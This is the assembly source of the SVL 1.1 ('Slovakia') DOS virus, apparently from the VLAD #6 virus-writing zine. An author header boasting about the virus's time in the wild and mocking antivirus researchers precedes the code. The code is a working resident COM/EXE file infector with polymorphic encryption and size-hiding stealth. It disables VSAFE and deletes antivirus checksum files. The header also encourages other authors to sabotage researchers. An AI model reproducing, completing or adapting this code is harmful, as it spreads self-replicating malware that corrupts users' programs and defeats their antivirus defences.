;***********************************************************************
;***** BEFORE READING THE SOURCE OR COMPILING , READ THIS !!! **********
;***********************************************************************
; THIS VIRUS WAS WRITTEN IN 12/93 - 1/94 SO DON'T BE SUPRISED, IF IT'S
; DETECTED BY ALL OF THE BETTER AV-PROGRAMS. THE SVL 1.x FAMILY OF VIRUSES
; WERE ( AND STILL ARE ) IN THE WILD. VX HAS A GOOD POLYMORPHIC ENGINE ,
; SIMPLE SEMI-STEALTH, BUT IS RATHER POORLY OPTIMISED :(
; NAME : SVL 1.1
; FAMILY MEMBERS : SVL 1.0
; SVL 1.1 ... was the bugfix for 1.0
; SVL 1.2 ... i can't remember what was new here
; SVL.KILL ... this isn't our work, this version
; rewrites sectors of HD at random
; ALIASES : SlovakiaII , New_Slovakia
; AUTHORS : JX , proffesor , mengele - members of SVL
; ORIGIN : .sk aka Slovakia aka Slovak republic
; RELEASED : Jan , 1994
; REFERENCES : AVPVE links this virus as SlovakiaII to the Slovak family.
; That's wrong, of course :) . Another AVPVE mistake is
; saying that virus contains strings like 'SlovakiaII.3584a'
; and 'SlovakiaII.3584b' . I am sure there are no such
; strings in the sources . It looks like somebody tried to
; recompile sources which we released to our friends.
; TYPE : - resident COM & EXE infector
; - infection on exe
; - int 21 hooked
; - semi-stealth
; - prints fake message
; REMOVAL METHODS : various , e.g. formating HD, but our choice is
; to ftp to ftp.elf.stuba.sk /pub/pc/sac/svl.zip ,
; where u can get a nice remover.
; POSTDISCOVERY HISTORY : after beeing in the wild for 11 months, we
; decided to show our goodwill to the AV-boyz
; and send them sources, but as they
; should have work very hard for their money,
; they got no disc or e-mail with the source. They
; got the sources printed on paper . :)))))
; Just imagine the situation : u have to re-type
; 30 pages. I think they were very happy !
; I wish I could have seen their faces as they opened
; our special 'delivery'. We also added a letter
; which can u find in VLAD#4 in article called
; Slovakia by Qark.
; WE STRONGLY RECCOMEND THE STRATEGY DESCRIBED ABOVE FOR DRIVING SOME VIRUS
; RESEARCHERS MAD. IF YOUR VIRUS HAS HUGE SOURCES, TRY IT. TRY TO INCLUDE
; SOME BUGS IN SUCH SPECIAL SOURCES. MAKE THE AV TYPE IT !!!
; THEY'LL BE HAPPY !!!
; Gretings to : VYVOJAR , _COKE_ , SEPULTURA , KDKD , TUIR , MMIR , MJunkie
; DARKMAN , QARK , METABOLIS , VLAD , IR and all from #v
; and to our favourite FRED FLINTSTONE
; special greetings to PFC fredey - army is cool , or isn't it ? :)))
; / now u have time to code this promised 'super perfect mega virus ' /
; Tymto specialne pozdravujem Mira Trnku a prajem mu,aby mu rubrika vydrzala
; az do dochodkoveho veku . Stava sa na Slovensku pomaly kultovou postavou a
; zopar ludi mu asi chce vytvorit fanklub . Prosim pana Hubinskeho aby na -
; tychto par viet M.T upozornil ... he - he - he
; /MSG Blesk gimme know where're u , or mail us .
; As information should be free , we'll welcome all kind of them ...
; Do not allow the net censorship !!!
; JX/SVL MGL / SVL proffesor/SVL and freshman blesk/SVL
; P.S : Don't PaniX !!!!!!!!!!!!!!!!!!!
;
;------------------------- cut here ---------------------------------------
.model tiny
.286
.code
mov ah,9h ; Carrier file
push cs
pop ds
mov dx,offset LLL1
int 21h
mov ah,4ch
int 21h
LLL1: db "I$"
;***************************************************************************
DECST: mov ax,1h ;Decryptor
mov bx,20h
DEC1: mov cx,0000h
xor word ptr cs:[bx+0],cx
inc bx
inc bx
dec ax
jnz DEC1
;***************************************************************************
START: mov si,0020h ; Flexible entry point
mov di,si ; SI holds offset of START.
add di,13h
push ds ; Store segments
push es
push cs ;DS=CS.
pop ds
jmp TRACE1
AAAY: mov byte ptr ds:[di],0h
AAAX: jmp INST1
;---------------------------------
mov ah,4ch
int 21h
;---------------------------------
INST1: mov ah,04h ; Display message on screen (1-4.8)
int 1ah
cmp dh,01h
jnz INST2
cmp dl,3h
jnc INST2
mov dx,si
add dx,offset INSTTXT1-offset START
mov ah,09h
int 21h
mov ah,01h ; Clear cursor
mov ch,20h
int 10h
mov ah,86h ; wait for a while
mov cx,0020h
mov dx,0fffh
int 15h
INST2:
;---------------------------------
cmp byte ptr ds:[si+TYPFILE-START],2h ; COM or EXE file ?
jnz INST2C
;---------------------------------
mov ax,es ; calculate segment for EXE file
add ax,10h
push ax
NNCS: add ax,0000h ; add REL_CS, from original EXE header.
mov word ptr ds:[si+JMPCS-START],ax ; prepare jump to original
pop ax ; entry point
NNSS: add ax,0000h ; add REL_SS, from original EXE header.
mov word ptr ds:[si+INSTSS-START+1h],ax ;restore STACK segment
jmp INSTZV
;---------------------------------
INST2C: mov ax,cs
mov word ptr ds:[si+JMPCS-START],ax
mov word ptr ds:[si+JMPIP-START],100h
push si
cld
mov cx,3h
mov di,100h
add si,offset ZACCOM-START
rep movsb
pop si
;---------------------------------
INSTZV: mov ah,30h ; get DOS version
int 21h
cmp al,4h ; we dont go resitent
jnc INST4 ; if dos version is bellow 4.0
jmp INSTEND
;---------------------------------
INST4: mov cx,4321h
mov ah,54h ; Instalation check
int 21h
cmp bx,0EEE1h
jnz INST5
jmp INSTEND
;---------------------------------
INST5: mov ax,es ;Test if program MCB is last
dec ax
mov es,ax
cmp byte ptr es:[0000h],5ah
jz INST6
jmp INSTEND
;---------------------------------
INST6: mov bx,word ptr es:[0003h] ; calculate where we place virus
sub bx,100h ; from MCB.
mov dx,es
add dx,bx
inc dx
;---------------------------------
mov ax,cs ; do we have enough memory ?
cmp byte ptr ds:[si+TYPFILE-START],2h ; COM or EXE file.
jnz INST7
add ax,0101h ; add our size in para +1.
NNMIN: add ax,0000h ; add MINMEM from EXE-FILE header
jmp INST8
INST7: add ax,1000h
INST8: cmp dx,ax
jc INSTEND
;---------------------------------
mov word ptr es:[0003h],bx ; cut MCB by 4kB.
mov ax,es
inc ax
mov es,ax
mov ax,word ptr es:[0002h]
sub ax,100h
mov word ptr es:[0002h],ax
;---------------------------------
push si ; move body to the top of memory in VIRSEG.
mov cx,0e00h
push cs
pop ds
mov es,dx ; ES holds VIRSEG.
xor di,di
rep movsb
pop si
;---------------------------------
xor ax,ax
mov ds,ax
sub word ptr ds:[413h],4h ;subtract BIOSMEMSIZE by 4..
mov ax,word ptr ds:[21h*4h] ;hook INT 21h
mov word ptr es:[HPVECT21-START],ax
mov ax,word ptr ds:[21h*4h+2h]
mov word ptr es:[HPVECT21-START+2h],ax
mov ax,es
cli
mov word ptr ds:[21h*4h],offset SIZESTE-START
mov word ptr ds:[21h*4h+2h],ax
sti
;---------------------------------
INSTEND: xor ax,ax ;prepare register for exec.
xor bx,bx
xor cx,cx
xor dx,dx
xor bp,bp
xor di,di
cmp byte ptr cs:[si+TYPFILE-START],2h ;COM or EXE file.
jnz INSTENDC
;---------------------------------
xor si,si
pop es
pop ds
sahf
cli
INSTSP: mov sp,0000h ;Set original stack.
INSTSS: mov ax,0000h ;for EXE file.
mov ss,ax
sti
xor ax,ax
JMINS: db 0eah ;Leave virus loader.
JMPIP: db 00h
db 00h
JMPCS: db 00h
db 00h
;--------------------------------
INSTENDC:xor si,si ; start original COM file.
pop es ; restore segments pointing to PSP.
pop ds
sahf ; clear FLAGs.
jmp JMINS ; and exit from here
;--------------------------------
HPVECT21:dw 0h ;INT 21h
dw 0h
INSTTXT1:db 0dh,0ah,"I'am SLOVAKIA virus Version 1.2 Copyright"
db " (c) 1994 SVL",0dh,0ah,"$"
TYPFILE: db 2h ;Typ s£b. ktor˜ nesie v¡r. (0-povel. preklada‡,1-COM,2-EXE.)
ZACCOM: db 0h,0h,0h ;Data na za‡iatku p“v. COM s£b.
;****************************************************************************
REGDX: dw 0h ; offseyt of path to file (fn. EXEC).
REGDS: dw 0h ; segment of path to file (fn. EXEC).
NUMBDSK: db 0h ; drive number
IDFILE: db 0h ; file indentifier (0,1-COM,2-EXE).
PARAMVS: db 0h ; VSAFE parameters
AKTHNDL: dw 0h ; handle of opened file
TIMEHP: dw 0h ; here we store time
DATEHP: dw 0h ; date of victim
TABHEAD: db 1ch dup(0) ;where exe file header 'll be
SIZESEG: dw 0h ; filesize (DX*65536)+AX.
SIZEOFF: dw 0h ; AX
ATR: dw 0h ; attributes
DTX1: db "chklist.ms ",0h
DTX2: db "chklist.cps",0h
DTX3: db "smartchk.cps",0h
DTX4: db "svl.svl",0h
ASIZEVIR:dw 0h ; counter for write
CODETP: db 0h ; type of decryption
NCDX: dw 0h ; decryption key
STEASZAX:dw 0h ; file size
STEASZDX:dw 0h ; file size
;rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
SIZESTE: pushf ; Start of resident part
;--------------------------
pusha
mov bp,sp
mov ax,word ptr ss:[bp+22d]
test ax,0000001000000000b
jz OBNIF
mov bh,0fbh
jmp OBNIF1
OBNIF: mov bh,0fah
OBNIF1: mov byte ptr cs:[FLEG1-START],bh
mov byte ptr cs:[FLEG2-START],bh
mov byte ptr cs:[FLEG3-START],bh
mov byte ptr cs:[FLEG4-START],bh
popa
;--------------------------
cmp ah,4eh
jz SI1ST
cmp ah,4fh
jnz SIA
;-------------------------------------------------------------------------
SI1ST: popf ;handle int 21h FIND 1st FILE, FIND nxt FILE
pushf ;via handle( fn. 4e, 4f. )
call dword ptr cs:[HPVECT21-START]
pushf
pusha
push es
jc SI1STE
;-------------------------
mov ah,2fh ;INT 21h fn. 2fh GET DTA.
pushf
call dword ptr cs:[HPVECT21-START]
mov ax,word ptr es:[bx+18h]
shr ax,9h ; AX holds year
cmp ax,64h ; is infected ?
jc SI1STE
;--------------------------
mov ax,0e00h ; sizefile-ax.
sub word ptr es:[bx+1ah],ax ;
jnc SI1ST2 ; hide virus ...
dec word ptr es:[bx+1ah+2h]
SI1ST2: jmp SI1STE
;--------------------------
SI1STE: pop es
popa
popf
FLEG1: sti
retf 02
;-------------------------------------------------------------------------
SIA: cmp ah,11h
jz SIFC
cmp ah,12h
jnz SIEND
;-------------------------------------------------------------------------
SIFC: popf ; handle INT 21h, FN 11H, 12h FND FILE FCB
pushf
call dword ptr cs:[HPVECT21-START]
pushf
pusha
push es
cmp al,0h
jnz SIFCE ; error !
;-----------------------
mov ah,2fh ; get DTA.
pushf
call dword ptr cs:[HPVECT21-START]
cmp byte ptr es:[bx],0ffh ;is FCB extended ?
jz SIFC1
;-----------------------
SIFC3: mov ax,word ptr es:[bx+19h] ; is date changed ?
shr ax,9h ; Normal FCB.
cmp ax,64h
jc SIFCE
mov ax,0e00h ; hide virus
sub word ptr es:[bx+1dh],ax
jnc SIFC2 ; cut size by ax bytes
dec word ptr es:[bx+1dh+2h]
SIFC2: jmp SIFCE
;-----------------------
SIFC1: add bx,7h ; FCB is extended , skip garbage
jmp SIFC3
;-----------------------
SIFCE: pop es
popa
popf
FLEG2: sti
retf 02
;-------------------------------------------------------------------------
SIEND: cmp ah,54h ; instalation check
jnz SIEND1
cmp cx,4321h
jnz SIEND1
popf
pushf
call dword ptr cs:[HPVECT21-START]
mov bx,0eee1h
FLEG3: sti
retf 02
;-------------------------------------------------------------------------
;-------------------------------------------------------------------------
SIEND1: cmp ah,4bh ; fn EXEC.
jz ZAV0 ; here we infect files
jmp SIEND2
ZAV0: cmp al,00h
jz ZAV1
jmp SIEND2
;---------------------
ZAV1: pusha
push ds
push es
;---------------------
mov word ptr cs:[REGDX-START],dx ; store path to file
mov word ptr cs:[REGDS-START],ds ; (fn. EXEC)
;-------------------------------------------------------------------------
mov bx,dx ; test , what drive is it
push ds ; we infects only local HDs.
push dx
mov dl,byte ptr ds:[bx]
mov dh,byte ptr ds:[bx+1h]
cmp dh,3ah ; contains path drive letter ? (d:)
jz ZAV2
;---------------------
mov ah,19h ; get current drive
pushf
call dword ptr cs:[HPVECT21-START]
inc al
mov dl,al
jmp ZAV4
;---------------------
ZAV2: cmp dl,60h ; calculate drive number from ASCII
jnc ZAV3
sub dl,40h
jmp ZAV4
ZAV3: sub dl,60h
;---------------------
ZAV4: mov byte ptr cs:[NUMBDSK-START],dl ; store drive number
mov ah,1ch ; HD or FD ?
pushf
call dword ptr cs:[HPVECT21-START]
cmp al,0ffh ; error ?
jz ZAV444
cmp byte ptr ds:[bx],0f8h ;Test ID byte of disk FAT (F8-HD).
jnz ZAV444
;---------------------
mov bl,byte ptr cs:[NUMBDSK-START] ; is drive local ?
mov ax,4409h
pushf
call dword ptr cs:[HPVECT21-START]
jc ZAV444
test dx,1000h
jnz ZAV444
;---------------------
stc ;Disk is ok :)
jmp ZAV444E
;---------------------
ZAV444: clc ; wrong drive :(
ZAV444E: pop dx
pop ds
;-------------------------------------------------------------------------
jc ZAV5
jmp ZAVE
;---------------------
ZAV5: mov ah,62h ; test if actual process is AV
pushf
call dword ptr cs:[HPVECT21-START]
dec bx
push ds
mov ds,bx
mov si,08h
call FINDSTR
pop ds
jnc ZAV6
jmp ZAVE
;---------------------
ZAV6: call CHKASCIIZ ;Test if file (path ds:dx) is COM or EXE
jnc ZAV7 ; and if is AV or not
jmp ZAVE
ZAV7: jz ZAV8 ; set indentificator for actual file
mov byte ptr cs:[IDFILE-START],1h
jmp ZAV9
ZAV8: mov byte ptr cs:[IDFILE-START],2h
;---------------------
ZAV9: push ds ; fuck VSAFE (Msdos 6.0).
push dx
mov ax,0fa02h
mov dx,5945h
mov bl,0h
int 21h
mov byte ptr cs:[PARAMVS-START],cl
pop dx
pop ds
;---------------------
mov ax,4300h ; getfile attribs
pushf
call dword ptr cs:[HPVECT21-START]
jnc ZAV9A
jmp ZAVEVSF
ZAV9A: mov word ptr cs:[ATR-START],cx
;---------------------
mov ax,3d00h ;open file (Read only). just check it
pushf
call dword ptr cs:[HPVECT21-START]
jnc ZAV10
jmp ZAVEVSF
;---------------------
ZAV10: mov bx,ax ; get date
mov word ptr cs:[AKTHNDL-START],bx
mov ax,5700h
pushf
call dword ptr cs:[HPVECT21-START]
jnc ZAV11
jmp ZAVECHNDL
ZAV11: mov word ptr cs:[TIMEHP-START],cx ;and store date & time.
mov word ptr cs:[DATEHP-START],dx
shr dx,9h ; is file infected (date is +100 years ).
cmp dx,64h
jc ZAV12
jmp ZAVECHNDL
;---------------------
ZAV12: mov ah,3fh ;get 1Ch bytes from file start
push cs
pop ds
mov cx,1ch
mov dx,offset TABHEAD-START
pushf
call dword ptr ds:[HPVECT21-START]
jnc ZAV13
jmp ZAVECHNDL
;---------------------
ZAV13: mov ax,4202h ; get lenght
xor cx,cx
xor dx,dx
pushf
call dword ptr ds:[HPVECT21-START]
jnc ZAV14
jmp ZAVECHNDL
;----------------------
ZAV14: mov word ptr ds:[SIZESEG-START],dx ; store lenght
mov word ptr ds:[SIZEOFF-START],ax
cmp dx,0h ; isn't file too short ?
jnz ZAV15
cmp ax,400h
jnc ZAV15
jmp ZAVECHNDL
ZAV15: cmp byte ptr ds:[IDFILE-START],2h ; or too long ?
jz ZAV17
cmp ax,0eff0h ; COM size check
jc ZAV18
jmp ZAVECHNDL
ZAV17: cmp dx,7h ; EXE size check
jc ZAV16
jmp ZAVECHNDL
ZAV16: push bx
push ax
mov cx,dx ; match EXE file size in header with
mov ax,80h ; real size ?
xor dx,dx
mul cx
mov bx,ax
pop ax
mov cx,200h
xor dx,dx
div word ptr cx
xor dx,0h
jz ZAV16A
inc ax
ZAV16A: add ax,bx
cmp word ptr ds:[TABHEAD-START+4h],ax
pop bx
jz ZAV18
jmp ZAVECHNDL
;---------------------
ZAV18: cmp byte ptr ds:[IDFILE-START],2h ; is EXE file for
jnz ZAV19 ; macrosoft fensters ? (MSWIN)
mov si,offset TABHEAD-START
cmp word ptr ds:[si+18h],40h
jc ZAV19
jmp ZAVECHNDL
;---------------------
ZAV19: mov ah,3eh ; close file
pushf
call dword ptr ds:[HPVECT21-START]
jnc ZAV20
jmp ZAVECHNDL
;----------------------------------------------------------------------
ZAV20: call ANLPATH ; delete unfriendly files (CPAV,MSAV).
push cs ;chklist.ms .
pop ds
mov di,si
mov si,offset DTX1-START
mov cx,0fh
rep movsb
call ZAV20PRC
;---------------------
call ANLPATH
push cs ;chklist.cps
pop ds
mov di,si
mov si,offset DTX2-START
mov cx,0fh
rep movsb
call ZAV20PRC
;---------------------
call ANLPATH ;smartchk.cps.
push cs
pop ds
mov di,si
mov si,offset DTX3-START
mov cx,0fh
rep movsb
call ZAV20PRC
jmp ZAV21
;---------------------
ZAV20PRC: mov ah,41h ; i love this function
mov dx,0e00h
pushf
call dword ptr cs:[HPVECT21-START]
ret
;----------------------------------------------------------------------
;----------------------------------------------------------------------
ZAV21: mov ds,word ptr cs:[REGDS-START] ; normal attribs
mov dx,word ptr cs:[REGDX-START]
mov ax,4301h
mov cx,0h
pushf
call dword ptr cs:[HPVECT21-START]
jnc ZAV22
jmp ZAVEVSF
;---------------------
ZAV22: call ANLPATH ; rename exe,com FILE to
push cs ;SVL.svl
pop ds
mov di,si
mov si,offset DTX4-START
mov cx,0fh
rep movsb
mov ds,word ptr cs:[REGDS-START]
mov di,0e00h
mov ah,56h
pushf
call dword ptr cs:[HPVECT21-START]
jnc ZAV23
jmp ZAVEVSF
;---------------------
ZAV23: push cs ; open file R/w
pop ds
mov dx,0e00h
mov ax,3d02h
pushf
call dword ptr cs:[HPVECT21-START]
jnc ZAV24
jmp ZAVRENM
;---------------------
ZAV24: mov bx,ax
mov word ptr cs:[AKTHNDL-START],bx
push cs
pop ds
mov ah,byte ptr ds:[IDFILE-START] ; get indentifier
mov byte ptr ds:[TYPFILE-START],ah
cmp byte ptr ds:[IDFILE-START],2h ; COM or EXE file.
jz ZAV24XX
jmp ZAV25
;---------------------
ZAV24XX: mov ax,word ptr ds:[TABHEAD+14h-START] ; save IP.
mov word ptr ds:[JMPIP-START],ax
mov ax,word ptr ds:[TABHEAD+16h-START] ; save CS.
mov word ptr ds:[NNCS+1h-START],ax
mov ax,word ptr ds:[TABHEAD+10h-START] ; save SP.
mov word ptr ds:[INSTSP+1h-START],ax
mov ax,word ptr ds:[TABHEAD+0eh-START] ; save SS.
mov word ptr ds:[NNSS+1h-START],ax
;---------------------
mov cx,word ptr ds:[TABHEAD+8h-START] ; calculate new REL_CS,IP.
shl cx,4h ; CX= header size
mov ax,word ptr ds:[SIZEOFF-START] ; file size
mov dx,word ptr ds:[SIZESEG-START]
cmp ax,cx
jz ZAV25B
jnc ZAV25C
sub cx,ax
mov ax,0ffffh
sub ax,cx
inc ax
dec dx
jmp ZAV25E
ZAV25B: xor ax,ax
jmp ZAV25E
ZAV25C: sub ax,cx
;---------------------
ZAV25E: push ax ; ax+dx*(65536) is EXE size
mov cx,dx ; get REL_CS,IP.
xor dx,dx
mov ax,1000h
mul cx
mov bx,ax
pop ax
xor dx,dx
mov cx,10h
div word ptr cx
add ax,bx
;---------------------
mov word ptr ds:[TABHEAD+16h-START],ax ; EXE header new REL_CS.
mov word ptr ds:[TABHEAD+0eh-START],ax ; header new REL_SS.
mov word ptr ds:[TABHEAD+14h-START],dx ; header new IP.
mov word ptr ds:[TABHEAD+10h-START],1200h ; new SP.
;---------------------
mov ax,word ptr ds:[TABHEAD+0ah-START] ; handle MINMEM a MAXMEM.
add ax,70h
mov word ptr ds:[TABHEAD+0ah-START],ax
mov word ptr ds:[TABHEAD+0ch-START],0ffffh
;---------------------
ZAV25K: mov word ptr ds:[NNMIN+1h-START],ax
mov word ptr ds:[TABHEAD+12h-START],0h ; clear checksum
mov ax,word ptr ds:[TABHEAD+4h-START] ; add virus size
add ax,7h ; in pages
mov word ptr ds:[TABHEAD+4h-START],ax
jmp ZAV26
;---------------------
ZAV25: mov cx,3h ; store first 3 bytes from COM
mov si,offset TABHEAD-START
push cs
pop es
mov di,offset ZACCOM-START
rep movsb
mov ax,word ptr ds:[SIZEOFF-START] ; jump parametes
push ax
add ax,100h
mov dx,ax
pop ax
sub ax,3h
mov byte ptr ds:[TABHEAD-START],0e9h
mov word ptr ds:[TABHEAD+1h-START],ax
;---------------------
ZAV26: mov ax,dx ; generate decryptor
mov cx,1600d
push dx
mov dx,0e00h
call MDEVICE
pop dx
mov byte ptr ds:[CODETP-START],bh ; decryption type
mov word ptr ds:[ASIZEVIR-START],ax ; write counter
mov word ptr ds:[NCDX-START],cx ; key
add dx,ax
mov word ptr ds:[START+1h-START],dx ; FLEXIBLE ENTRY point.
mov byte ptr ds:[AAAX+1h-START],04h
;---------------------
push ax
mov bx,word ptr ds:[AKTHNDL-START]
mov ax,4202h ; lseek end
xor cx,cx
xor dx,dx
pushf
call dword ptr ds:[HPVECT21-START]
pop cx
jnc OPKOD
jmp ZAVENW
;---------------------
OPKOD: mov ah,40h ;WRITE decryptor
mov dx,0e00h
pushf
call dword ptr ds:[HPVECT21-START]
jnc OPKOD1
jmp ZAVENW
;---------------------
OPKOD1: xor cx,cx ; encrypt body and appent it to end
mov dx,3200d ; size of body
xor si,si
mov di,0e00h
;---------------------
ZAV27S: mov ax,word ptr ds:[si]
cmp byte ptr ds:[CODETP-START],1h
jz ZAV28
jnc ZAV27
xor ax,word ptr ds:[NCDX-START] ;XOR
jmp ZAV29
ZAV27: add ax,word ptr ds:[NCDX-START] ;SUB
jmp ZAV29
ZAV28: sub ax,word ptr ds:[NCDX-START] ;ADD
;---------------------
ZAV29: mov word ptr ds:[di],ax
sub dx,2h
add word ptr ds:[ASIZEVIR-START],2h
add di,2h
add si,2h
add cx,2h
cmp dx,0h
jnz ZAV29AX
jmp ZAV29AY
ZAV29AX: cmp cx,200h
jnz ZAV27S
;---------------------
ZAV29AY: push dx
mov ah,40h ; write to file
mov dx,0e00h
pushf
call dword ptr ds:[HPVECT21-START]
pop dx
jc ZAVENW
cmp dx,0h
jz ZAV30
mov di,0e00h
mov cx,0h
jmp ZAV27S
;---------------------
ZAV30: push ds ; generate additional bytes
push bx
mov ah,0h
int 1ah
cmp dx,0feffh
jc ZAV30TY
mov dx,0feffh
ZAV30TY: mov si,dx
mov ax,0h
mov ds,ax
mov di,0e00h
mov cx,200h
rep movsb
pop bx
pop ds
mov cx,0e00h ; padd virus to 3,5 kB.
sub cx,word ptr ds:[ASIZEVIR-START]
mov dx,0e00h
mov ah,40h
pushf
call dword ptr ds:[HPVECT21-START]
jc ZAVENW
;---------------------
mov ax,4200h ; lseek start 0
xor cx,cx
xor dx,dx ; 2 years ago we didn't use cwd :)
pushf
call dword ptr ds:[HPVECT21-START]
jc ZAVENW
;--------------------- ;Write 1c bytes to file start
mov ah,40h
mov cx,1ch
mov dx,offset TABHEAD-START
pushf
call dword ptr ds:[HPVECT21-START]
jc ZAVENW
;---------------------
mov cx,word ptr ds:[TIMEHP-START] ; mark DATE = DATE +100 years
mov dx,word ptr ds:[DATEHP-START]
push dx
shr dx,9h
add dx,64h
shl dx,9h
pop ax
and ax,0000000111111111b
or dx,ax
mov ax,5701h
pushf
call dword ptr ds:[HPVECT21-START]
jc ZAVENW
;---------------------
ZAVENW: mov ah,3eh ;Close handle.
mov bx,word ptr cs:[AKTHNDL-START]
pushf
call dword ptr cs:[HPVECT21-START]
;---------------------
ZAVRENM: call ANLPATH ; rename SVL.svl back to original
push cs
pop ds
mov di,si
mov si,offset DTX4-START
mov cx,0fh
rep movsb
mov dx,0e00h
mov di,word ptr cs:[REGDX-START]
mov es,word ptr cs:[REGDS-START]
mov ah,56h
pushf
call dword ptr cs:[HPVECT21-START]
;---------------------
push es ; restore attribs
pop ds
push di
pop dx
mov ax,4301h
mov cx,word ptr cs:[ATR-START]
pushf
call dword ptr cs:[HPVECT21-START]
jmp ZAVEVSF
;-----------------------------------------------------------------------
;-----------------------------------------------------------------------
ZAVECHNDL:mov ah,3eh
mov bx,word ptr cs:[AKTHNDL-START]
pushf
call dword ptr cs:[HPVECT21-START]
;---------------------
ZAVEVSF: mov dx,5945h ; restore VSAFE.
mov ax,0fa02h
mov bl,byte ptr cs:[PARAMVS-START]
int 21h
ZAVE: pop es
pop ds
popa
jmp SIENDCE
;-------------------------------------------------------------------------
;-------------------------------------------------------------------------
SIEND2: cmp ax,4202h ;fn. LSEEK
jz LLLH ; want they file size or what ?
jmp SIENDCE
LLLH: cmp cx,0h
jz LLLH1
jmp SIENDCE
LLLH1: cmp dx,0h
jz OOPR
jmp SIENDCE
;---------------------
OOPR: popf
pushf
call dword ptr cs:[HPVECT21-START]
jc SSSE
pushf
pusha
push es
push ds
;---------------------
mov word ptr cs:[STEASZAX-START],ax ; save file size
mov word ptr cs:[STEASZDX-START],dx
mov ax,5700h ; check date
pushf
call dword ptr cs:[HPVECT21-START]
jc SSSRE
shr dx,9h ; is file infected ? ( + 100 years).
cmp dx,64h
jc SSSRE
;---------------------
mov ah,62h ;Test for AV activity
pushf
call dword ptr cs:[HPVECT21-START]
dec bx
push ds
mov ds,bx
mov si,08h
call FINDSTR
pop ds
jnc SSSRE
;---------------------
mov ax,word ptr cs:[STEASZAX-START] ; LSEEK end -3,5kB.
mov dx,word ptr cs:[STEASZDX-START]
cmp ax,0e00h
jz SSS1
jc SSS3
sub ax,0e00h
jmp SSS2
SSS3: dec dx
mov cx,0ffffh
mov bx,0e00h
sub bx,ax
sub cx,bx
inc cx
mov ax,cx
jmp SSS2
SSS1: mov ax,0h
SSS2: mov word ptr cs:[STEASZAX-START],ax
mov word ptr cs:[STEASZDX-START],dx
;---------------------
SSSRE: pop ds
pop es
popa
popf
mov ax,word ptr cs:[STEASZAX-START]
mov dx,word ptr cs:[STEASZDX-START]
FLEG4: sti
SSSE: retf 0002h
;-------------------------------------------------------------------------
;-------------------------------------------------------------------------
SIENDCE: popf
jmp dword ptr cs:[HPVECT21-START]
;-------------------------------------------------------------------------
TRACE1: mov cx,10d
TRACE2: dec cx
jnz TRACE2
jmp AAAY
;***************************************************************************
include FINDSTR.inc
include ANLPATH.inc
include MDEVICE.inc
include TXT.inc
END
- VLAD #6 INDEX -